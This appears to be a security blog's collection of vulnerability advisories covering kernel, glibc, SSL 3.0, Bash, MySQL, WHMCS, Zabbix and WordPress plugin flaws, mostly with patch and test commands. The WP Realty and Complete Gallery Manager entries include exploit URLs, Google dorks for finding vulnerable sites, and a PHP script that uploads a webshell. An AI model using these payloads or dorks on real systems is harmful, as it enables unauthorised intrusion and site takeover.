Categories
Linux Security Advisories

Linux Kernel memory use risk – CVE-2014-5332

Race condition in NVMap in NVIDIA Tegra Linux Kernel 3.10 alllows local users to gain privileges via a crafted NVMAP_IOC_CREATE IOCTL call, which triggers a use-after-free error, as demonstrated by using a race condition to escape the Chrome sandbox.

Weakness classification

  • CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (‘Race Condition’)

Timeline

August 18, 2014 MITRE reserved CVE
February 6, 2015 NVD published advisory

Affected products

  • Linux Kernel 3.10

Authority references

Vendor & other references

 

Categories
CentOS CloudLinux Control Panels cPanel/WHM Debian DirectAdmin Linux Linux Security Plesk Security Advisories SolusVM Ubuntu

GHOST: glibc vulnerability (CVE-2015-0235)

Background Information

GHOST is a ‘buffer overflow’ bug affecting the gethostbyname() and gethostbyname2() function calls in the glibc library. This vulnerability allows a remote attacker that is able to make an application call to either of these functions to execute arbitrary code with the permissions of the user running the application.

Impact

The gethostbyname() function calls are used for DNS resolving, which is a very common event. To exploit this vulnerability, an attacker must trigger a buffer overflow by supplying an invalid hostname argument to an application that performs a DNS resolution.

A list of affected Linux distros

  • RHEL (Red Hat Enterprise Linux) version 5.x, 6.x and 7.x
  • CentOS Linux version 5.x, 6.x & 7.x
  • Ubuntu Linux version 10.04, 12.04 LTS
  • Debian Linux version 7.x
  • Linux Mint version 13.0
  • Fedora Linux version 19 or older
  • SUSE Linux Enterprise 11 and older (also OpenSuse Linux 11 or older versions).
  • SUSE Linux Enterprise Software Development Kit 11 SP3
  • SUSE Linux Enterprise Server 11 SP3 for VMware
  • SUSE Linux Enterprise Server 11 SP3
  • SUSE Linux Enterprise Server 11 SP2 LTSS
  • SUSE Linux Enterprise Server 11 SP1 LTSS
  • SUSE Linux Enterprise Server 10 SP4 LTSS
  • SUSE Linux Enterprise Desktop 11 SP3
  • Arch Linux glibc version <= 2.18-1

Resolution

Update the glibc and nscd packages on your system using:

Fix for Centos/RHEL/Fedora 5,6,7:

  •  yum update glibc
  • Restart ALL running services or reboot the server as an alternative.

Fix for Ubuntu:

  • sudo apt-get clean
  • sudo apt-get update
  • sudo reboot
Categories
Linux Security Security Advisories Uncategorized Windows Security

The POODLE Attack – SSL 3.0 Protocol Vulnerability (CVE-2014-3566)

Systems Affected

All systems and applications utilizing the Secure Socket Layer (SSL) 3.0 with cipher-block chaining (CBC) mode ciphers may be vulnerable. However, the POODLE (Padding Oracle On Downgraded Legacy Encryption) attack demonstrates this vulnerability using web browsers and web servers, which is one of the most likely exploitation scenarios.

 

Solution

There is currently no fix for the vulnerability SSL 3.0 itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system/application configurations is the most viable solution currently available.

 

** Updates available: RHEL/CentOS/RPM based OS:

yum -y update openssl

** You MUST disable SSLv3 in all used services (httpd, mail, etc) , The update just prevents the downgrading but the protocol itself is still vulnerable.

Categories
Linux Security Advisories

Shellshock vulnerability (CVE-2014-6271, CVE-2014-7169)

This vulnerabilityCVE-2014-6271 could allow for arbitrary code execution. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.

You can also manually test your version of Bash by running the following command:

$ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"

If the output of the above command contains a line containing only the word vulnerable you are using a vulnerable version of Bash. The patch used to fix this issue ensures that no code is allowed after the end of a Bash function.

Note that different Bash versions will also print different warnings while executing the above command. The Bash versions without any fix produce the following output:

$ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
vulnerable
bash: BASH_FUNC_x(): line 0: syntax error near unexpected token `)'
bash: BASH_FUNC_x(): line 0: `BASH_FUNC_x() () { :;}; echo vulnerable'
bash: error importing function definition for `BASH_FUNC_x'
test

The versions with only the original CVE-2014-6271 fix applied produce the following output:

$ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
bash: error importing function definition for `BASH_FUNC_x()'
test

The versions with additional fixes from RHSA-2014:1306, RHSA-2014:1311 and RHSA-2014:1312 produce the following output:

$ env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `BASH_FUNC_x'
test

The difference in the output is caused by additional function processing changes explained in the “How does this impact systems” section below.

The fix for CVE-2014-7169 ensures that the system is protected from the file creation issue. To test if your version of Bash is vulnerable to CVE-2014-7169, run the following command:

$ cd /tmp; rm -f /tmp/echo; env 'x=() { (a)=>\' bash -c "echo date"; cat /tmp/echo
bash: x: line 1: syntax error near unexpected token `='
bash: x: line 1: `'
bash: error importing function definition for `x'
Fri Sep 26 11:49:58 GMT 2014

If your system is vulnerable, the time and date information will be output on the screen and a file called /tmp/echo will be created.

If your system is not vulnerable, you will see output similar to:

$ cd /tmp; rm -f /tmp/echo; env 'x=() { (a)=>\' bash -c "echo date"; cat /tmp/echo
date
cat: /tmp/echo: No such file or directory

If your system is vulnerable, you can fix these issues by updating to the most recent version of the Bash package by running the following command:

# yum update bash
Categories
Security Advisories Web Applications

WHMCS SQL injection Exploit

** A patch was released. See http://blog.whmcs.com/?t=80223  

WHMCS, a popular billing/support/customer management system, is still suffering from critical SQL injection issues. Today, yet another vulnerability, including exploit was released. 

Due to the fact that there is no patch available at this point, I will refrain from linking to any exploit details, but it is pretty trivial to find the respective blog post which includes a script to exploit the vulnerability. WHMCS acknowledged the problem.

The root cause of this problem, as well as prior problems with the software, appears to be a lack in understanding of proper controls to prevent SQL injection. Good input validation is just a start, but prepared statements are a must. Instead, the WHMCS developers used a rather complex (and buggy) function to escape user input and assemble dynamic SQL queries.

The bug is in a function used throughout WHMCS, so the exploit is not limited to a particular URL.

http://blog.whmcs.com/?t=80206

Categories
Linux MySQL Security Advisories

Multiple vulnerabilities mysql – Mandriva

  Problem Description:
  Multiple vulnerabilities has been discovered and corrected in mysql:
  Unspecified vulnerability in MySQL 5.5.x before 5.5.23 has unknown
  impact and attack vectors related to a Security Fix, aka Bug
  #59533. NOTE: this might be a duplicate of CVE-2012-1689, but as of
  20120816, Oracle has not commented on this possibility (CVE-2012-2750).
  Unspecified vulnerability in the MySQL Server component in Oracle
  MySQL 5.1.70 and earlier, 5.5.32 and earlier, and 5.6.12 and earlier
  allows remote authenticated users to affect availability via unknown
  vectors related to Optimizer (CVE-2013-3839).
  The updated packages have been upgraded to the 5.1.72 version which
  is not vulnerable to these issues.
  _______________________________________________________________________
  References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2750
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3839
  http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
  http://dev.mysql.com/doc/relnotes/mysql/5.1/en/news-5-1-72.html
  _______________________________________________________________________
  Updated Packages:
  Mandriva Enterprise Server 5:
  ba2a7994838db84ffdc554e6897ec6b8  mes5/i586/libmysql16-5.1.72-0.1mdvmes5.2.i586.rpm
  f761773fd2dd239a9982e41488a01589  mes5/i586/libmysql-devel-5.1.72-0.1mdvmes5.2.i586.rpm
  abfdfe6c0c1af08a146002d41c65ccf7  mes5/i586/libmysql-static-devel-5.1.72-0.1mdvmes5.2.i586.rpm
  5a356e9080a7e351c34d69615b67138f  mes5/i586/mysql-5.1.72-0.1mdvmes5.2.i586.rpm
  ceea7d8c944d46832cd7d1715a0b9faa  mes5/i586/mysql-bench-5.1.72-0.1mdvmes5.2.i586.rpm
  0c534ad2edd6e3a19ab619bff7e28411  mes5/i586/mysql-client-5.1.72-0.1mdvmes5.2.i586.rpm
  1b8da9ced8bb0f1b641f4a610da6dfc1  mes5/i586/mysql-common-5.1.72-0.1mdvmes5.2.i586.rpm
  1cf5ea7c2186cae90ca188fe5ee4d96b  mes5/SRPMS/mysql-5.1.72-0.1mdvmes5.2.src.rpm
  Mandriva Enterprise Server 5/X86_64:
  412d97676eff68f560968bfb499342ca  mes5/x86_64/lib64mysql16-5.1.72-0.1mdvmes5.2.x86_64.rpm
  d53dc8b107a306df0da123b00fef42e4  mes5/x86_64/lib64mysql-devel-5.1.72-0.1mdvmes5.2.x86_64.rpm
  3f65e5f322b7d0cb98bfb3d5c92937a1  mes5/x86_64/lib64mysql-static-devel-5.1.72-0.1mdvmes5.2.x86_64.rpm
  5237d5ee69b11bb576f117dd9477ec56  mes5/x86_64/mysql-5.1.72-0.1mdvmes5.2.x86_64.rpm
  db8fe6784e34ddb88b7e020db79d1272  mes5/x86_64/mysql-bench-5.1.72-0.1mdvmes5.2.x86_64.rpm
  9a15c79afd52d0a5794d52d06eef1146  mes5/x86_64/mysql-client-5.1.72-0.1mdvmes5.2.x86_64.rpm
  bb37ec21d892efe9950f1dc4b09fda6b  mes5/x86_64/mysql-common-5.1.72-0.1mdvmes5.2.x86_64.rpm
  1cf5ea7c2186cae90ca188fe5ee4d96b  mes5/SRPMS/mysql-5.1.72-0.1mdvmes5.2.src.rpm
  _______________________________________________________________________
  To upgrade automatically use MandrivaUpdate or urpmi.  The verification
  of md5 checksums and GPG signatures is performed automatically for you.
  All packages are signed by Mandriva for security.  You can obtain the
  GPG public key of the Mandriva Security Team by executing:
  gpg –recv-keys –keyserver pgp.mit.edu 0x22458A98
  You can view other update advisories for Mandriva Linux at:
  http://www.mandriva.com/en/support/security/advisories/
Categories
Security Advisories Web Applications

WordPress WP Realty Plugin – Blind SQL Injection

# Exploit Title: WordPress - wp-realty - MySQL Time Based Injection

# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
Categories
Security Advisories

Zabbix 2.0.8 SQL Injection and Remote Code Execution

This exploits an unauthenticated SQL injection vulnerability affecting Zabbix versions 2.0.8 and lower.  The SQL injection issue can be abused in order to retrieve an active session ID.  If an administrator level user is identified, remote code execution can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file.

 

Categories
Security Advisories Web Applications

WordPress Plugin Complete Gallery Manager 3.3.3 – Arbitrary File Upload Vulnerability

A arbitrary file upload web vulnerability is detected in the CodeCanyon WordPress Plugin Complete Gallery Manager v3.3.3 Web-Application.

The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on
application-side of the service.
The vulnerability is located in the /plugins/complete-gallery-manager/frames/ path when processing to upload via the  upload-images.php
file own malicious context or webshells. After the upload the remote attacker can access the file with one extension and exchange it with the
other one to execute for example php codes.
Exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard).
Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.
Vulnerable Application(s):
                [+] CodeCanyon - Complete Gallery Manager
Vulnerable Module(s):
                [+] Image File Upload
Vulnerable File(s):
                [+] upload-images.php
Affected Module(s):
                [+] Application Index Listing (http://localhost:8000/)
Proof of Concept:
=================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For demonstration or reproduce ...
Vuln page :
http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Exploit :
<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Upload Access Path : http://wordpress.localhost:8080/wp-content/2013/09/up.php
Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/
Reference(s):
http://xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://www.xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://xxx.org/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Risk:
=====
The security risk of the arbitrary file upload web vulnerability is estimated as high(+).
Categories
Security Advisories Web Applications

WordPress Lazy SEO plugin Shell Upload Vulnerability

This plugin can be exploited and used to upload a malicious shell on the account and this posses risks to the account itself and to the whole server as well.  The weakness lies within the lazyseo.php file as it lacks the appropriate authentications and input validation. An upgrade has been released by the vendor and is highly recommended to upgrade.